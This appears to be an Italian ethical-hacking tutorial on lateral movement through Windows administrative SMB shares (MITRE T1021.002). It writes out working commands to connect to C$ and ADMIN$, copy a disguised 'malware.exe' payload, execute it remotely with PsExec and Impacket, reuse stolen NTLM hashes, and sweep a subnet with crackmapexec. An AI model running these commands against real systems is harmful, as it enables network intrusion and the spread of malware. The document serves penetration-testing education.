Condivisioni Amministrative SMB: Remote File Share (T1021.002)
Le condivisioni amministrative Windows rappresentano uno dei vettori più sfruttati per il movimento laterale nelle reti aziendali. Questa tecnica sfrutta il protocollo Server Message Block (SMB) per accedere a share di rete nascoste come C$, ADMIN$ e IPC$, accessibili solo con privilegi amministrativi.
Il meccanismo si inserisce nella fase di Lateral Movement (TA0008) della kill chain, permettendo agli attaccanti di propagarsi attraverso la rete dopo aver compromesso le credenziali iniziali. La tecnica è particolarmente insidiosa perché utilizza funzionalità legittime di Windows, rendendola difficile da distinguere dalle normali attività amministrative.
I dati mostrano un utilizzo massiccio: 26 gruppi APT documentati, 30 strumenti che la implementano e 8 campagne di alto profilo. Gruppi come APT28, Lazarus Group e Sandworm Team hanno dimostrato come questa tecnica possa essere devastante quando combinata con credenziali rubate o tecniche Pass-the-Hash.
Il test di questa tecnica inizia con la mappatura delle condivisioni amministrative disponibili. Su Windows, il comando base per connettersi a una share remota utilizza la sintassi:
net use \\target-ip\C$ /user:domain\username password
Una volta stabilita la connessione, puoi copiare file eseguibili sulla macchina target e schedulare l'esecuzione remota. La sequenza classica prevede prima la copia del payload:
copy malware.exe \\target-ip\ADMIN$\temp\update.exe
Per l'esecuzione remota, PsExec di Sysinternals rimane lo strumento di riferimento. La sintassi per eseguire comandi con output locale:
psexec \\target-ip -u domain\admin -p password cmd.exe
Gli attaccanti più sofisticati preferiscono Impacket, una suite Python che include smbexec.py per operazioni stealth. L'approccio evita di lasciare servizi permanenti sul sistema target:
python smbexec.py domain/user:password@target-ip
Su Linux, il tool smbclient permette di esplorare le share disponibili. Per elencare tutte le condivisioni su un host:
smbclient -L //target-ip -U domain\\username%password
La tecnica diventa ancora più potente quando combinata con hash NTLM rubati. Tools come Mimikatz permettono di estrarre gli hash e riutilizzarli senza conoscere la password in chiaro. Il comando per Pass-the-Hash con Impacket:
python psexec.py -hashes :ntlmhash domain/admin@target-ip
Per simulare comportamenti APT avanzati, concatena multiple tecniche. Prima enumera gli host nella subnet con crackmapexec, poi propaga lateralmente:
crackmapexec smb 192.168.1.0/24 -u admin -p password --shares
Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?
Scarica la guida gratuita e segui il percorso corretto fin dal primo passo